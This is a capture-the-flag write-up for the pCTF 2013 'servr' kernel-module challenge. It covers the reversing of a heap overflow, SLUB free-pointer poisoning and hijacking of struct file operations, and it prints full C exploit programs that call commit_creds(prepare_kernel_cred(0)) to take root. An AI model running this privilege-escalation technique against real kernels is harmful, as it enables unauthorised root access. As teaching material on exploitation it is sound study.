26 Apr 2013

pCTF 2013 – servr (web 400)

The challenge description is:

We got a shell on this crazy guy’s web server, but he’s running some really weird software :( Help me get higher privileges please?

As it turns out, this guy is really crazy, since his web server is implemented as a kernel module, and this “web” challenge is actually a kernel pwning challenge.

If we log in there is a file servr.ko in the home directory. That file extension usually indicates a kernel module, and indeed if we run lsmod we can see that a kernel module named servr is loaded.

Trying to access the server sometimes gives a valid HTTP response which just contains the data the user sent in a POST request, but sometimes the kernel just crashes instead. It is clear that there is some memory corruption going on here, so it’s time to spend some time reversing the binary to see if we can understand the bug.

I first tried using objdump for this, which is really suboptimal, since the references to external functions and even some of the internal cross-references are not resolved. This is because they are stored as relocation entries, which a plain objdump disassembly apparently does not apply (the calls all show up as e8 00 00 00 00). After writing some scripts to produce a decent disassembly with proper annotations the view is much clearer, but there is still quite a bit of code to go through. Most of this code does not really appear to be relevant to the challenge, such as the storing of HTTP header keys and values in a doubly-linked list (looks like struct list_head, which is used a lot in the kernel).

As it turns out, the bug happens all the way at the end of the request handling cycle, when a response is built and sent to the client. This code prepends a fixed HTTP header to the data received from the client and sends the whole thing back as the response. The problem is that the buffer has the size of the received data and does not take the HTTP header’s size into account. So the allocated buffer is always overflowed by 0x40 bytes of user-controlled data.

Disassembly with basic comments (not cleaned up, sorry):

0000000000000580 <finish_handle_request>:
 580:	55                   	push   rbp
 581:	48 89 e5             	mov    rbp,rsp
 584:	53                   	push   rbx
 585:	48 89 fb             	mov    rbx,rdi
 588:	48 83 ec 08          	sub    rsp,0x8
 58c:	c7 47 28 02 00 00 00 	mov    DWORD PTR [rdi+0x28],0x2
 593:	48 8b 7f 70          	mov    rdi,QWORD PTR [rdi+0x70] ; len
 597:	48 85 ff             	test   rdi,rdi
 59a:	0f 84 c0 00 00 00    	je     660 <finish_handle_request+0xe0>
 5a0:	48 89 bb 80 00 00 00 	mov    QWORD PTR [rbx+0x80],rdi
 5a7:	be d0 80 00 00       	mov    esi,0x80d0 ; flags
 5ac:	e8 00 00 00 00       	call   5b1 <finish_handle_request+0x31> ; kmalloc
 5b1:	48 85 c0             	test   rax,rax
 5b4:	48 89 43 78          	mov    QWORD PTR [rbx+0x78],rax ; mydata?->dataofs
 5b8:	0f 84 a2 00 00 00    	je     660 <finish_handle_request+0xe0> ; skip_buffer_building
 5be:	49 b8 20 32 30 30 20 	movabs r8,0xd4b4f2030303220
 5c5:	4f 4b 0d 
 5c8:	49 b9 0a 53 65 72 76 	movabs r9,0x3a7265767265530a
 5cf:	65 72 3a 
 5d2:	49 ba 20 73 65 72 76 	movabs r10,0x312f727672657320
 5d9:	72 2f 31 
 5dc:	49 bb 2e 30 0d 0a 43 	movabs r11,0x746e6f430a0d302e
 5e3:	6f 6e 74 
 5e6:	48 b9 3a 20 74 65 78 	movabs rcx,0x702f74786574203a
 5ed:	74 2f 70 
 5f0:	48 bf 48 54 54 50 2f 	movabs rdi,0x312e312f50545448
 5f7:	31 2e 31 
 5fa:	48 ba 65 6e 74 2d 74 	movabs rdx,0x657079742d746e65
 601:	79 70 65 
 604:	48 be 6c 61 69 6e 0d 	movabs rsi,0xa0d0a0d6e69616c
 60b:	0a 0d 0a 
 60e:	c6 83 90 00 00 00 01 	mov    BYTE PTR [rbx+0x90],0x1
 615:	4c 89 40 08          	mov    QWORD PTR [rax+0x8],r8
 619:	4c 89 48 10          	mov    QWORD PTR [rax+0x10],r9
 61d:	4c 89 50 18          	mov    QWORD PTR [rax+0x18],r10
 621:	4c 89 58 20          	mov    QWORD PTR [rax+0x20],r11
 625:	48 89 48 30          	mov    QWORD PTR [rax+0x30],rcx
 629:	48 89 38             	mov    QWORD PTR [rax],rdi
 62c:	48 89 50 28          	mov    QWORD PTR [rax+0x28],rdx
 630:	48 89 70 38          	mov    QWORD PTR [rax+0x38],rsi
 634:	c6 40 40 00          	mov    BYTE PTR [rax+0x40],0x0
 638:	48 8b 7b 78          	mov    rdi,QWORD PTR [rbx+0x78] ; dest (+0x40 later)
 63c:	48 8b 73 68          	mov    rsi,QWORD PTR [rbx+0x68] ; src
 640:	48 8b 53 70          	mov    rdx,QWORD PTR [rbx+0x70] ; count (content length)
 644:	48 83 c7 40          	add    rdi,0x40
 648:	e8 00 00 00 00       	call   64d <finish_handle_request+0xcd> ; memcpy
 64d:	48 89 df             	mov    rdi,rbx
 650:	e8 5b fe ff ff       	call   4b0 <client_handle_send> ; *(rbx+0x80) == *(rbx+0x70) == len, rbx+0x78 is buf
 655:	48 83 c4 08          	add    rsp,0x8
 659:	5b                   	pop    rbx
 65a:	5d                   	pop    rbp
 65b:	c3                   	ret    

The big block of movabs instructions moves the static response string into the start of the newly allocated buffer, which was allocated using kmalloc. You can clearly see content-length bytes of data being copied into the buffer at offset 0x40, even though the buffer was allocated with only content-length bytes.
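To check that the static header really is 0x40 bytes long, the eight movabs immediates can be decoded by hand. The sketch below does this in C; the constants are copied from the listing above and ordered by the buffer offset they are stored to, while the names header_qwords and decode_header are made up for this example.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>
#include <string.h>

/* The eight immediates from the movabs block, ordered by the buffer
 * offset each one is stored to (0x00, 0x08, ..., 0x38). */
static const uint64_t header_qwords[8] = {
    0x312e312f50545448ULL, /* [rax+0x00], loaded via rdi */
    0x0d4b4f2030303220ULL, /* [rax+0x08], loaded via r8  */
    0x3a7265767265530aULL, /* [rax+0x10], loaded via r9  */
    0x312f727672657320ULL, /* [rax+0x18], loaded via r10 */
    0x746e6f430a0d302eULL, /* [rax+0x20], loaded via r11 */
    0x657079742d746e65ULL, /* [rax+0x28], loaded via rdx */
    0x702f74786574203aULL, /* [rax+0x30], loaded via rcx */
    0x0a0d0a0d6e69616cULL, /* [rax+0x38], loaded via rsi */
};

/* Rebuild the header bytes the way an x86-64 store lays them out
 * (least significant byte first). out must hold at least 65 bytes.
 * Returns the header length without the terminating NUL. */
size_t decode_header(char *out)
{
    size_t n = 0;

    assert(out != NULL);
    for (size_t q = 0; q < 8; q++)
        for (unsigned b = 0; b < 8; b++)
            out[n++] = (char)((header_qwords[q] >> (8 * b)) & 0xff);
    out[n] = '\0'; /* mirrors the "mov BYTE PTR [rax+0x40],0x0" store */
    return n;
}
```

Decoding gives the status line, a Server header and a Content-type header followed by an empty line, 64 bytes in total, which is where the 0x40 offset passed to memcpy comes from.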

So now we have an overflow, but what is actually being overwritten here?

We have to discuss briefly how memory allocations happen in the kernel. As you can see, memory is allocated using kmalloc, which uses a memory allocator to actually perform the allocation. The current default memory allocator in the Linux kernel is the SLUB allocator. This allocator obtains memory in large chunks (multiples of 4096 bytes) and splits each chunk into allocations of one fixed size. The free allocations are kept in a linked list: they are removed from it when allocated and added back when freed. You can view the various size categories on your own system by typing “cat /proc/slabinfo” and looking at the entries that start with “kmalloc”. This file is only readable by root, however, so you cannot read it on the actual server.

For this reason it is a good idea to start the downloadable VM locally, extract the initramfs using gunzip and cpio, alter the init script to spawn a root shell instead of a user-level shell, repack the initramfs image, and boot the VM to a root shell. You can now debug your exploit with root privileges.

Now we can exploit an overflow in two different ways:

  • We can overflow into metadata used by the SLUB allocator, or
  • We can overflow into an adjacent allocated object

The second method is a bit tricky, since we need to know the type of object that was allocated next to ours. There are ways to guarantee this pretty easily on a system with so little going on (no other services and such), but there was a hint that overwriting the free pointer is very easy on SLUB. So, we go for the first option.

As mentioned before, free allocations are in a linked list, so each of them starts with a pointer to the next free allocation. So if we make those first 8 bytes (remember this is a 64-bit system, so pointers are 64 bits long) point to some userspace address, at some point a kmalloc in that size category will take our pointer from the free list and return it to its caller. At that point some kind of kernel data will be in a userspace buffer that we can freely modify and inspect, which is an extremely powerful technique. The hint mentions a file object, so let’s go with that.
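The effect of overwriting a free pointer can be reproduced entirely in userspace with a toy free list. The following is only a simplified model, not SLUB itself: it assumes the next-free pointer lives in the first bytes of each free object, as described above, and it ignores per-CPU lists and everything else the real allocator does. All names (toy_slab, toy_alloc, toy_poison) are invented for the illustration.

```c
#include <assert.h>
#include <stddef.h>
#include <string.h>

#define OBJ_SIZE 256
#define NUM_OBJS 4

struct toy_slab {
    unsigned char mem[NUM_OBJS * OBJ_SIZE]; /* objects packed back to back */
    void *freelist;                         /* first free object, or NULL  */
};

/* Chain every object into the free list through its first bytes. */
void toy_init(struct toy_slab *s)
{
    for (size_t i = 0; i < NUM_OBJS; i++) {
        void *next = (i + 1 < NUM_OBJS) ? s->mem + (i + 1) * OBJ_SIZE : NULL;
        memcpy(s->mem + i * OBJ_SIZE, &next, sizeof(next));
    }
    s->freelist = s->mem;
}

/* Pop the head of the free list; the new head is whatever pointer is
 * stored at the start of the object being handed out. */
void *toy_alloc(struct toy_slab *s)
{
    void *obj = s->freelist;

    if (obj != NULL)
        memcpy(&s->freelist, obj, sizeof(void *));
    return obj;
}

/* Allocate one object, overflow it by one pointer into its free
 * neighbour, then allocate twice more. Returns the last allocation. */
void *toy_poison(struct toy_slab *s, void *target)
{
    unsigned char *victim;

    toy_init(s);
    victim = toy_alloc(s);
    assert(victim != NULL);
    memcpy(victim + OBJ_SIZE, &target, sizeof(target)); /* the overflow */
    toy_alloc(s);        /* hands out the neighbour, loads our pointer  */
    return toy_alloc(s); /* follows the poisoned pointer                */
}
```

In this model the first allocation after the overflow still returns the corrupted neighbour; it is the one after that which lands at the attacker-chosen address. The target buffer should be zeroed beforehand so that the free list ends there.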

A file object is a ‘struct file’ in the C source code of the kernel, and you can find its definition in include/linux/fs.h:

struct file {
        /*
         * fu_list becomes invalid after file_free is called and queued via
         * fu_rcuhead for RCU freeing
         */
        union {
                struct list_head        fu_list;
                struct rcu_head         fu_rcuhead;
        } f_u;
        struct path             f_path;
#define f_dentry        f_path.dentry
        struct inode            *f_inode;       /* cached value */
        const struct file_operations    *f_op;

// ....

}

It’s quite a large structure, so I removed a lot of less interesting lines from the end.

If we want this structure to be allocated in our userspace memory buffer then we have to make sure the allocation that we overflow is in the same size category as the ‘struct file’ structure. You can easily determine the category by taking a copy of the contents of /proc/slabinfo, opening a few hundred files, and then looking at /proc/slabinfo again and checking which slab has seen a spike in the number of allocations. As it turns out, this is slab kmalloc-192, so the size of our allocation has to be at most 192 bytes but above the next lowest size category.
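Comparing two snapshots of /proc/slabinfo by eye is tedious, so here is a rough sketch of how the comparison for a single cache could be automated. It relies only on the first two columns of a slabinfo data line (cache name and active object count); the function names are made up, and reading the file itself (as root, in the local VM) is left out.

```c
#include <assert.h>
#include <stdio.h>
#include <string.h>

/* Parse "<name> <active_objs> ..." from one /proc/slabinfo data line.
 * Returns 1 on success, 0 for header lines or malformed input. */
int parse_slab_line(const char *line, char name[64], unsigned long *active)
{
    assert(line != NULL);
    if (line[0] == '#' || strncmp(line, "slabinfo", 8) == 0)
        return 0;
    return sscanf(line, "%63s %lu", name, active) == 2;
}

/* Store the change in active objects between two snapshot lines of the
 * same cache in *delta. Returns 1 on success, 0 if either line fails to
 * parse or the two lines belong to different caches. */
int slab_growth(const char *before, const char *after, long *delta)
{
    char n1[64], n2[64];
    unsigned long a1, a2;

    if (!parse_slab_line(before, n1, &a1) || !parse_slab_line(after, n2, &a2))
        return 0;
    if (strcmp(n1, n2) != 0)
        return 0;
    *delta = (long)a2 - (long)a1;
    return 1;
}
```

Running this over every cache before and after opening a few hundred files should make the cache that backs struct file stand out as the one with the largest growth.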

That means our request body should be 192-0x40 = 128 bytes, of which the last 0x40 will overflow. therefore, we should have something like this:

exploit = "A" * (128-0x40) + struct.pack("Q", ptr) + "A" * (0x40 - 8)
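The relation between body length, size category and the number of bytes that spill into the next object is easy to get wrong, so here is a small helper for experimenting with it. The list of size classes is an assumption (the usual kmalloc caches on an x86-64 SLUB build); verify it against /proc/slabinfo on the target. The names kmalloc_class and spill_bytes are invented for this sketch.

```c
#include <assert.h>
#include <stddef.h>

#define HDR_LEN 0x40 /* size of the fixed HTTP header that is prepended */

/* Assumed kmalloc size classes, smallest first. */
static const size_t kmalloc_classes[] = {
    8, 16, 32, 64, 96, 128, 192, 256, 512, 1024, 2048, 4096
};

/* Smallest assumed size class that fits n bytes, or 0 if none does. */
size_t kmalloc_class(size_t n)
{
    for (size_t i = 0; i < sizeof(kmalloc_classes) / sizeof(kmalloc_classes[0]); i++)
        if (n <= kmalloc_classes[i])
            return kmalloc_classes[i];
    return 0;
}

/* Bytes written past the end of the slab object when the server builds
 * a response for a request body of body_len bytes: the buffer is
 * allocated with body_len bytes but HDR_LEN + body_len are written. */
size_t spill_bytes(size_t body_len)
{
    size_t cls = kmalloc_class(body_len);
    size_t written = HDR_LEN + body_len;

    assert(cls != 0);
    return written > cls ? written - cls : 0;
}
```

Under these assumptions a 200-byte body is served from the 256-byte class and spills exactly 8 bytes, one pointer, which is the combination the C programs in this post use. A 128-byte body is served from the 128-byte class and spills the full 0x40 bytes.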

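However, we will write the exploit in C, because it needs to run on the system itself. This is because when we trigger an allocation at our chosen userspace address, the current process has to be our exploit process, since the pointer is unlikely to be valid in other processes (and in any case we cannot manipulate the data if it is in another process). Note that the C code below targets the 256-byte size category instead: its 200-byte body makes the copy end exactly 8 bytes past the allocation, just enough to overwrite the next free pointer.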

To start with we will make a simple program that consumes all current empty allocations of the right size, performs the overflow, then creates a bunch of files, and then dumps the contents of our userspace memory buffer to verify that some kind of kernel object now lives there.

#include <unistd.h>
#include <stdlib.h>
#include <sys/stat.h>
#include <sys/types.h> 
#include <sys/socket.h>
#include <netinet/in.h>
#include <string.h>
#include <fcntl.h>
#include <errno.h>
                                                        
void err(char * msg) {
    write(1,msg,strlen(msg));
    char nl = '\n';
    write(1,&nl, 1);
    exit(errno);
}

// memory area where the kernel will allocate a struct file
char myfile[4096];

// misc buffer
char buffer[4096];

char * hexchars = "0123456789abcdef";


int main(int argc, char *argv[])
{
    int sockfd, fd;
    int n, i;
    struct sockaddr_in serv_addr = {
        .sin_addr = { .s_addr = htonl(INADDR_LOOPBACK) },
        .sin_family = AF_INET,
        .sin_port = htons(80),
    };

    memset(myfile, 0, sizeof(myfile));

    // open lots of files to take up any unused slab entries
	// (needed to ensure an empty allocation will follow the one for 
	// our response page)

    for (i = 0; i < 100; i++) if (open("/etc/passwd", O_RDONLY) < 0) err("open lots 1");

    // create request that will overflow a 256-byte heap allocation by 8 bytes
    // (which is the size of a pointer). those 8 bytes contain a pointer to
    // myfile, which will be used as the spot where the next heap allocation
    // from the 256-byte slab will be allocated.

    strcpy(buffer, "POST / HTTP/1.1\r\nContent-Length: 200\r\n\r\n"); // 200 = 256 - 0x40 + 8
    for (i = 0; i < 200 - 8; i++)
        strcat(buffer, "A");
    i = strlen(buffer);
    *((void**) (buffer + i)) = myfile;
    i += sizeof(void**);

	// send the trigger to the server and read all the response data

    sockfd = socket(AF_INET, SOCK_STREAM, 0);
    if (sockfd < 0) err("socket");

    if (connect(sockfd, (struct sockaddr *) &serv_addr, sizeof(serv_addr)) < 0) err("connect");

    n = write(sockfd, buffer, i);
    if (n < 0) err("write");
    if (n != i) err("short write");

    while (read(sockfd, buffer, sizeof(buffer)) > 0) {}

    close(sockfd);

    sleep(1);

    int fds[100];
    
    // open a bunch of files
	// if the defragmentation worked 100%, the first one should land
	// in 'myfile'. otherwise one of the later ones will be it.
    for (i = 0; i < 100; i++) if ((fds[i] = open("/etc/passwd", O_RDONLY)) < 0) err("open lots 2");

	// hex dump the myfile area to show that the kernel did indeed put
	// a struct file there
    for (i = 0; i < sizeof(myfile); i++) {
        buffer[0] = hexchars[((unsigned char) myfile[i]) >> 4];
        buffer[1] = hexchars[((unsigned char) myfile[i]) & 0xf];
        buffer[2] = (i & 0xf) == 0xf ? '\n' : ' ';
        write(1, buffer, 3);
    }

    buffer[0] = '\n';
    write(1, buffer, 1);

    // don't exit. the kernel now thinks myfile is a part of the
    // kmalloc-256 slab, which will be bad when this program exits.
    // could be fixed up but I can't be bothered.
    while (1) sleep(1);

    return 0;
}
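The request-building part of the program above can also be written as a small bounds-checked helper, which makes it easier to experiment with other body lengths. This is a sketch, not the code that was used during the CTF; build_request and its parameters are names invented here.

```c
#include <assert.h>
#include <stdio.h>
#include <string.h>

/* Build a POST request whose body is body_len bytes long: 'A' filler
 * followed by the raw bytes of ptr as the last sizeof(void *) bytes.
 * Returns the total request length, or 0 if it does not fit in cap. */
size_t build_request(char *buf, size_t cap, size_t body_len, const void *ptr)
{
    int hdr;
    size_t total;

    assert(buf != NULL && body_len >= sizeof(ptr));
    hdr = snprintf(buf, cap,
                   "POST / HTTP/1.1\r\nContent-Length: %zu\r\n\r\n", body_len);
    if (hdr < 0)
        return 0;
    total = (size_t)hdr + body_len;
    if (total > cap)
        return 0;

    /* filler up to the point where the overflow reaches the next object */
    memset(buf + hdr, 'A', body_len - sizeof(ptr));
    /* the pointer that ends up on top of the next free pointer */
    memcpy(buf + total - sizeof(ptr), &ptr, sizeof(ptr));
    return total;
}
```

Calling build_request(buffer, sizeof(buffer), 200, myfile) should produce the same bytes as the strcpy/strcat loop in the program above, and the return value is the length to pass to write().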

To make it easier to compile this program and ship it to the server, we compile it with klcc, a gcc wrapper script from an Ubuntu package that links the binary statically against klibc, a minimal libc. This yields a very small binary that can be easily gzip’ed, base64 encoded, and then pasted to the server.

When you run this you will see that the buffer that we cleared now magically contains a whole bunch of data, which is actually a struct file placed there by the kernel.

Now we need to manipulate this object to obtain code execution. Remember the “struct file” layout given above. There is an f_op member which points to a “struct file_operations” structure. This structure contains a whole lot of function pointers that implement the various operations that can be performed on this file object:

struct file_operations {
        struct module *owner;
        loff_t (*llseek) (struct file *, loff_t, int);
        ssize_t (*read) (struct file *, char __user *, size_t, loff_t *);
        ssize_t (*write) (struct file *, const char __user *, size_t, loff_t *);
        ssize_t (*aio_read) (struct kiocb *, const struct iovec *, unsigned long, loff_t);
        ssize_t (*aio_write) (struct kiocb *, const struct iovec *, unsigned long, loff_t);
        int (*readdir) (struct file *, void *, filldir_t);
        unsigned int (*poll) (struct file *, struct poll_table_struct *);

// ....

}

Again, it’s quite a large struct. But we’ll use the llseek function, simply because it is the first function pointer and we don’t have to convert the whole structure definition to something that will compile without all the kernel’s type definitions.

Here are our much abbreviated definitions of the struct file and struct file_operations:

// fake struct file_operations
struct kern_fop {
    void *owner;
    ssize_t (*llseek) (void *, ssize_t, int);
	char misc[1024]; 
};

// fake struct file
struct kern_file {
    void * fu_list[2];
    void * path[2];
    struct kern_fop *fop;
};

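As you can see there’s barely anything there. The only important thing is that the fop and llseek members sit at the same offsets as the corresponding members in the real structure definitions. Note that the fake struct file has no slot for the f_inode member that appears in the listing above, so on a 64-bit system it places fop at offset 0x20; that only matches a kernel whose struct file does not have f_inode in front of f_op.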
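Since everything depends on those two offsets, it is worth checking them before trusting the fake structs. The sketch below repeats the two definitions and computes the offsets with offsetof; the values to compare against have to come from the target kernel (headers or debug info), so the parameters of fake_layout_matches are placeholders for numbers you determine yourself.

```c
#include <assert.h>
#include <stddef.h>
#include <sys/types.h>

/* fake struct file_operations, as defined above */
struct kern_fop {
    void *owner;
    ssize_t (*llseek) (void *, ssize_t, int);
    char misc[1024];
};

/* fake struct file, as defined above */
struct kern_file {
    void * fu_list[2];
    void * path[2];
    struct kern_fop *fop;
};

/* Offset of the f_op stand-in inside the fake struct file. */
size_t fake_fop_offset(void)
{
    return offsetof(struct kern_file, fop);
}

/* Offset of the llseek stand-in inside the fake struct file_operations. */
size_t fake_llseek_offset(void)
{
    return offsetof(struct kern_fop, llseek);
}

/* Returns 1 if the fake layout agrees with the offsets measured on the
 * target kernel (real_f_op and real_llseek are supplied by the caller). */
int fake_layout_matches(size_t real_f_op, size_t real_llseek)
{
    assert(sizeof(void *) == sizeof(struct kern_fop *));
    return fake_fop_offset() == real_f_op &&
           fake_llseek_offset() == real_llseek;
}
```

On a 64-bit build the fake structs put fop at offset 32 and llseek at offset 8. If the real struct file has an extra pointer in front of f_op, fake_layout_matches returns 0 and the fake struct needs a padding member.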

Now we expand our previous program to replace the f_op pointer in our struct file with a pointer to our own version, which is mostly empty except for a pointer to our own implementation of the llseek callback for the file object. Since our llseek callback will be invoked in kernel mode, it will have full access to the kernel’s address space, including all kernel functions and data. So we can just call some kernel function that gives the current process full root permissions, and then return as if nothing happened.

The classic way to do this is to call two kernel functions as follows:

commit_creds(prepare_kernel_cred(0));

This sets the permissions of the current process to the same permissions used for the kernel’s own processes, which equates to root permissions.

We can find the location of the necessary kernel functions using /proc/kallsyms:

$ grep prepare_kernel_cred /proc/kallsyms
ffffffff81063510 T prepare_kernel_cred
$ grep commit_creds /proc/kallsyms
ffffffff81063250 T commit_creds

So our implementation of llseek becomes:


// taken from /proc/kallsyms:
// ffffffff81063250 T commit_creds
// ffffffff81063510 T prepare_kernel_cred

void * (*prepare_kernel_cred)(int) = (void*) 0xffffffff81063510ul;
void (*commit_creds)(void *) = (void*) 0xffffffff81063250ul;

int code_executed = 0;

// called in kernel mode
ssize_t my_llseek(void * a, ssize_t b, int c) {

	// tell the main program we got called by the kernel
    code_executed = 1;

	// restore the (struct file)->f_op pointer for safety
    fakefile->fop = (struct kern_fop *) orig_fop;

	// grab ALL the permissions
    commit_creds(prepare_kernel_cred(0));

    return 0;
}

Note the two function pointers. Also, we set a global variable once the kernel mode code has been called, so we can detect this later. Calling printf or other C library functions from kernel mode is not advisable, so we can’t just write a message.

To be safe, we put the original f_op pointer back once our code has been called, so that if the kernel tries to call any other file operation after our llseek it will not crash (as long as our process is the current process, that is).

We could do a bunch of stuff to clean up nicely after ourselves, but there’s really not much point. So we just add some code to read the key file and then enter an infinite loop, to try and prevent the kernel from crashing in the most stupid way possible.

The full exploit is a bit dirty, but it does the job and prints the flag file:

#include <unistd.h>
#include <stdlib.h>
#include <sys/stat.h>
#include <sys/types.h> 
#include <sys/socket.h>
#include <netinet/in.h>
#include <string.h>
#include <fcntl.h>
#include <errno.h>

// fake struct file_operations
struct kern_fop {
    void *owner;
    ssize_t (*llseek) (void *, ssize_t, int);
	char misc[1024]; 
};

// fake struct file
struct kern_file {
    void * fu_list[2];
    void * path[2];
    struct kern_fop *fop;
};
                                                        
void err(char * msg) {
    write(1,msg,strlen(msg));
    char nl = '\n';
    write(1,&nl, 1);
    exit(errno);
}

// memory area where the kernel will allocate a struct file
char myfile[4096];

// misc buffer
char buffer[4096];

void * orig_fop;

ssize_t my_llseek(void *, ssize_t, int);

struct kern_file * fakefile = (void*) &myfile;
struct kern_fop fakefop = {
    .llseek = my_llseek,
};


char * hexchars = "0123456789abcdef";

// taken from /proc/kallsyms:
// ffffffff81063250 T commit_creds
// ffffffff81063510 T prepare_kernel_cred

void * (*prepare_kernel_cred)(int) = (void*) 0xffffffff81063510ul;
void (*commit_creds)(void *) = (void*) 0xffffffff81063250ul;

int code_executed = 0;

// called in kernel mode
ssize_t my_llseek(void * a, ssize_t b, int c) {

	// tell the main program we got called by the kernel
    code_executed = 1;

	// restore the (struct file)->f_op pointer for safety
    fakefile->fop = (struct kern_fop *) orig_fop;

	// grab ALL the permissions
    commit_creds(prepare_kernel_cred(0));

    return 0;
}


int main(int argc, char *argv[])
{
    int sockfd, fd;
    int n, i;
    struct sockaddr_in serv_addr = {
        .sin_addr = { .s_addr = htonl(INADDR_LOOPBACK) },
        .sin_family = AF_INET,
        .sin_port = htons(80),
    };

    memset(myfile, 0, sizeof(myfile));

    // open lots of files to take up any unused slab entries
	// (needed to ensure an empty allocation will follow the one for 
	// our response page)

    for (i = 0; i < 100; i++) if (open("/etc/passwd", O_RDONLY) < 0) err("open lots 1");

    // create request that will overflow a 256-byte heap allocation by 8 bytes
    // (which is the size of a pointer). those 8 bytes contain a pointer to
    // myfile, which will be used as the spot where the next heap allocation
    // from the 256-byte slab will be allocated.

    strcpy(buffer, "POST / HTTP/1.1\r\nContent-Length: 200\r\n\r\n"); // 200 = 256 - 0x40 + 8
    for (i = 0; i < 200 - 8; i++)
        strcat(buffer, "A");
    i = strlen(buffer);
    *((void**) (buffer + i)) = myfile;
    i += sizeof(void**);

	// send the trigger to the server and read all the response data

    sockfd = socket(AF_INET, SOCK_STREAM, 0);
    if (sockfd < 0) err("socket");

    if (connect(sockfd, (struct sockaddr *) &serv_addr, sizeof(serv_addr)) < 0) err("connect");

    n = write(sockfd, buffer, i);
    if (n < 0) err("write");
    if (n != i) err("short write");

    while (read(sockfd, buffer, sizeof(buffer)) > 0) {}

    close(sockfd);

    sleep(1);

    int fds[100];
    
    // open a bunch of files
	// if the defragmentation worked 100%, the first one should land
	// in 'myfile'. otherwise one of the later ones will be it.
    for (i = 0; i < 100; i++) if ((fds[i] = open("/etc/passwd", O_RDONLY)) < 0) err("open lots 2");

	// hex dump the myfile area to show that the kernel did indeed put
	// a struct file there
    for (i = 0; i < sizeof(myfile); i++) {
        buffer[0] = hexchars[((unsigned char) myfile[i]) >> 4];
        buffer[1] = hexchars[((unsigned char) myfile[i]) & 0xf];
        buffer[2] = (i & 0xf) == 0xf ? '\n' : ' ';
        write(1, buffer, 3);
    }

    buffer[0] = '\n';
    write(1, buffer, 1);
    
	// save the original (struct file)->f_op ptr, and then overwrite it 
	// with a pointer to our fake struct. this fake struct will redirect
	// llseek operations to my_llseek.
    orig_fop = fakefile->fop;
    fakefile->fop = &fakefop;

	// wait a while (not sure anymore why)
    sleep(1);

	// trigger our llseek call
    loff_t res;
    for (i = 0; i < 100; i++) llseek(fds[i], 0, SEEK_END);
    
	// my_llseek should have set our uid to 0 and code_executed=1
    if (code_executed && getuid() == 0) {
        write(1, "WIN\n", 4);

		// open flag file, read it, and write to stdout.
		// could also spawn a shell, but better keep it simple.
        fds[0] = open("/root/flag", O_RDONLY);
        if (fds[0] < 0) err("open flag");
        i = read(fds[0], buffer, sizeof(buffer));
        if (i <= 0) err("read flag");
        if (write(1, buffer, i) != i) err("out flag");
      
    } else {
        write(1, "FAIL\n", 5);
    }

    // don't exit. the kernel now thinks myfile is a part of the
    // kmalloc-256 slab, which will be bad when this program exits.
    // could be fixed up but I can't be bothered.
    while (1) sleep(1);

    return 0;
}

{3 Responses to “pCTF 2013 – servr (web 400)”}

  1. Awesome job guys!!! Thanks for sharing!

    Danux
  2. Hi, could you please share details about kcc compilation process? is kcc available? if not, what other options we have to compile/port the code to qemu?

    Dan
  3. Huh, it was a typo, you meant klcc not kcc.

    Hey